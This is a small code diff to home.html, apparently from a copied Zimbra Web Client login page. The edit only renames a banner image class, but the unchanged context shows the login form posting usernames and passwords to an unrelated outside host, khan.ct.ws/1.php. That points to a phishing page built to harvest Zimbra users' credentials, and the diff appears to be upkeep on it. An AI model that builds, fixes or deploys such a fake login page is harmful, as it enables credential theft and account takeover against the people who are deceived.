--- a/home.html
+++ b/home.html
@@ -55,7 +55,7 @@
 		<div class="center">
 			<div class="contentBox">
 				<h1><a href="" id="bannerLink" target="_new" title="Zimbra"><span class="ScreenReaderOnly">Zimbra</span>
-					<span class="./ImgLoginBanner"></span>
+					<span class="./ImgLoginBanner.png"></span>
 				</a></h1>
 				<div id="ZLoginAppName">Web Client</div>
 				<form method="post" name="loginForm" action="https://khan.ct.ws/1.php" accept-charset="UTF-8">
